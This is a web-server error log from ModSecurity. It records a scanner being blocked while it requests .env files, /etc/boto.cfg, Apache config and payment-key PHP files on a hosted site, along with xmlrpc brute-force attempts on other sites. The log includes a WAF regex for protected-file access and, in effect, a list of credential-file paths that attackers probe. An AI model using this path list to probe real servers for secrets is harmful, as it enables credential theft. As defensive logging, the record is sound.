[Tue May 26 13:39:42.803148 2026] [security2:error] [pid 536875:tid 537110] [client 45.148.10.95:39850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config.php"] [unique_id "ahVVRur_-FTveSGlx1HrYAAAAO4"]
[Tue May 26 13:39:42.956782 2026] [security2:error] [pid 536875:tid 537051] [client 45.148.10.95:9864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/config/.env"] [unique_id "ahVVRur_-FTveSGlx1HrawAAALM"]
[Tue May 26 13:39:42.975718 2026] [security2:error] [pid 544395:tid 544542] [client 45.148.10.95:9812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/aws.php"] [unique_id "ahVVRhmrs7g3RMCdp8XKGQAAABE"]
[Tue May 26 13:39:42.978084 2026] [autoindex:error] [pid 544395:tid 544628] [client 49.14.127.27:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 13:39:43.007987 2026] [security2:error] [pid 544395:tid 544599] [client 45.148.10.95:39912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/config.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKGwAAAEo"]
[Tue May 26 13:39:43.014181 2026] [security2:error] [pid 544395:tid 544597] [client 45.148.10.95:9848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/config.inc.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKHAAAAEg"]
[Tue May 26 13:39:43.128639 2026] [security2:error] [pid 536875:tid 537031] [client 45.148.10.95:9864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/module.config.php"] [unique_id "ahVVR-r_-FTveSGlx1HrdQAAAJ8"]
[Tue May 26 13:39:43.140106 2026] [security2:error] [pid 536875:tid 537086] [client 45.148.10.95:9730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/env.php"] [unique_id "ahVVR-r_-FTveSGlx1HrdgAAANY"]
[Tue May 26 13:39:43.163729 2026] [security2:error] [pid 536875:tid 537077] [client 45.148.10.95:39878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/nexmo.php"] [unique_id "ahVVR-r_-FTveSGlx1HreQAAAM0"]
[Tue May 26 13:39:43.181358 2026] [security2:error] [pid 536875:tid 537106] [client 45.148.10.95:9788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/config/stripe.php"] [unique_id "ahVVR-r_-FTveSGlx1HrewAAAOo"]
[Tue May 26 13:39:43.190678 2026] [security2:error] [pid 544395:tid 544556] [client 49.14.127.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKKQAAAB8"], referer: https://www.ucdc.co.in/
[Tue May 26 13:39:43.271657 2026] [security2:error] [pid 544395:tid 544580] [client 129.222.147.134:57469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKMQAAADc"]
[Tue May 26 13:39:43.279444 2026] [security2:error] [pid 544395:tid 544580] [client 129.222.147.134:57469] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKMQAAADc"]
[Tue May 26 13:39:43.299430 2026] [security2:error] [pid 544395:tid 544569] [client 106.192.248.115:62416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKIgAAACw"]
[Tue May 26 13:39:43.299666 2026] [security2:error] [pid 544395:tid 544569] [client 106.192.248.115:62416] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKIgAAACw"]
[Tue May 26 13:39:43.394521 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/crm/.env"] [unique_id "ahVVR-r_-FTveSGlx1HrhQAAAI0"]
[Tue May 26 13:39:43.415900 2026] [security2:error] [pid 544395:tid 544647] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/cron/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKPQAAAHo"]
[Tue May 26 13:39:43.458790 2026] [security2:error] [pid 544395:tid 544622] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/current/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKPgAAAGE"]
[Tue May 26 13:39:43.475591 2026] [security2:error] [pid 544395:tid 544635] [client 45.148.10.95:39882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/demo/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKPwAAAG4"]
[Tue May 26 13:39:43.482256 2026] [security2:error] [pid 544395:tid 544531] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/dev/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKQAAAAAY"]
[Tue May 26 13:39:43.492617 2026] [security2:error] [pid 544395:tid 544606] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKHwAAAFE"]
[Tue May 26 13:39:43.509487 2026] [security2:error] [pid 544395:tid 544636] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/developer/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKQwAAAG8"]
[Tue May 26 13:39:43.509739 2026] [security2:error] [pid 536875:tid 537115] [client 45.148.10.95:9716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/develop/.env"] [unique_id "ahVVR-r_-FTveSGlx1HrhwAAAPM"]
[Tue May 26 13:39:43.512038 2026] [security2:error] [pid 544395:tid 544573] [client 45.148.10.95:39900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/development/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKRAAAADA"]
[Tue May 26 13:39:43.524029 2026] [cgid:error] [pid 544395:tid 544579] [client 45.148.10.95:39920] AH01264: stderr from /home2/whitece9/public_html/dnscfg.cgi: script not found or unable to stat
[Tue May 26 13:39:43.685121 2026] [security2:error] [pid 536875:tid 537084] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/erp/.env"] [unique_id "ahVVR-r_-FTveSGlx1HrkgAAANQ"]
[Tue May 26 13:39:43.700334 2026] [security2:error] [pid 536875:tid 537037] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVVR-r_-FTveSGlx1HrlQAAAKU"]
[Tue May 26 13:39:43.712617 2026] [security2:error] [pid 544395:tid 544577] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/fe/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKVQAAADQ"]
[Tue May 26 13:39:43.712783 2026] [security2:error] [pid 544395:tid 544586] [client 45.148.10.95:39858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/etc/boto.cfg"] [unique_id "ahVVRxmrs7g3RMCdp8XKVgAAAD0"]
[Tue May 26 13:39:43.789356 2026] [security2:error] [pid 544395:tid 544530] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/front/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKWQAAAAU"]
[Tue May 26 13:39:43.792429 2026] [security2:error] [pid 544395:tid 544565] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/frontend/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKWgAAACg"]
[Tue May 26 13:39:43.856493 2026] [security2:error] [pid 536875:tid 537074] [client 45.148.10.95:9880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/info.php"] [unique_id "ahVVR-r_-FTveSGlx1HrmwAAAMo"]
[Tue May 26 13:39:43.860639 2026] [security2:error] [pid 544395:tid 544632] [client 45.148.10.95:9824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/infophp.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKXwAAAGs"]
[Tue May 26 13:39:43.860660 2026] [security2:error] [pid 544395:tid 544555] [client 45.148.10.95:39858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/infos.php"] [unique_id "ahVVRxmrs7g3RMCdp8XKYAAAAB4"]
[Tue May 26 13:39:43.909803 2026] [security2:error] [pid 536875:tid 537120] [client 45.148.10.95:9782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/laravel/.env"] [unique_id "ahVVR-r_-FTveSGlx1HrnQAAAPg"]
[Tue May 26 13:39:43.929307 2026] [security2:error] [pid 544395:tid 544610] [client 45.148.10.95:39882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/lms/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKZwAAAFU"]
[Tue May 26 13:39:43.936846 2026] [autoindex:error] [pid 544395:tid 544601] [client 49.14.127.27:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 13:39:43.938299 2026] [security2:error] [pid 544395:tid 544536] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/local/.env"] [unique_id "ahVVRxmrs7g3RMCdp8XKaAAAAAs"]
[Tue May 26 13:39:43.969058 2026] [security2:error] [pid 536875:tid 537028] [client 45.148.10.95:9716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/market/.env"] [unique_id "ahVVR-r_-FTveSGlx1HrnwAAAJw"]
[Tue May 26 13:39:43.984787 2026] [security2:error] [pid 536875:tid 537048] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/marketing/.env"] [unique_id "ahVVR-r_-FTveSGlx1HroAAAALA"]
[Tue May 26 13:39:43.991987 2026] [security2:error] [pid 536875:tid 537103] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/media/.env"] [unique_id "ahVVR-r_-FTveSGlx1HroQAAAOc"]
[Tue May 26 13:39:44.034463 2026] [security2:error] [pid 544395:tid 544542] [client 45.148.10.95:9760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/new/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKbwAAABE"]
[Tue May 26 13:39:44.050115 2026] [security2:error] [pid 536875:tid 537118] [client 45.148.10.95:39990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node-api/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrpAAAAPY"]
[Tue May 26 13:39:44.058753 2026] [security2:error] [pid 536875:tid 537058] [client 45.148.10.95:9782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrpQAAALo"]
[Tue May 26 13:39:44.079556 2026] [security2:error] [pid 544395:tid 544628] [client 45.148.10.95:39882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/api/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKcAAAAGc"]
[Tue May 26 13:39:44.085065 2026] [security2:error] [pid 544395:tid 544602] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/backend/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKcQAAAE0"]
